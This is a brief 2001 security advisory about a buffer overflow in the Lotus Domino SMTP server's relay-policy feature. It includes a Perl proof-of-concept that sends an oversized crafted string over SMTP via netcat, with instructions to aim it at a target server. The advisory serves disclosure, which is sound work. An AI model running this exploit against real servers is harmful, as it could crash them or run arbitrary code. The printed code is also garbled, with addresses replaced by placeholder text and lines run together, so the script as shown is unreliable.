Lotus Domino Notes Vulnerable To Buffer Overflow

Lotus Domino Notes SMTP Server is vulnerable to a buffer overflow that could result in arbitrary code being launched.

Steve Manzuik

January 22, 2001

1 Min Read
ITPro Today logo

Reported January 23, 2001, by S.A.F.E.R.

VERSIONS AFFECTED

DESCRIPTIONLotus Domino SMTP Server contains a policy feature that you can use to prevent email relaying. However, a malicious attacker can use a vulnerability in this policy feature to overflow the buffer and possibly launch arbitrary commands.

DEMONSTRATION

S.A.F.E.R. supplied the following proof-of-concept code:

-- cut --

#!/usr/bin/perl

$req="a" . "%A"x200 . "A"x600 . "%[email protected]";

print "ehlo foomail from: [email protected]

to:$reqdatafoo.quit";

-- cut --

Simply replace “allowed.domain.com” with the domain name running Lotus Notes SMTP Server, and pipe the output through netcat.

VENDOR RESPONSE

Lotus was informed of this vulnerability on November 2, 2000, and has fixed this issue in release 5.06.

CREDITDiscovered by S.A.F.E.R.

Sign up for the ITPro Today newsletter
Stay on top of the IT universe with commentary, news analysis, how-to's, and tips delivered to your inbox daily.

You May Also Like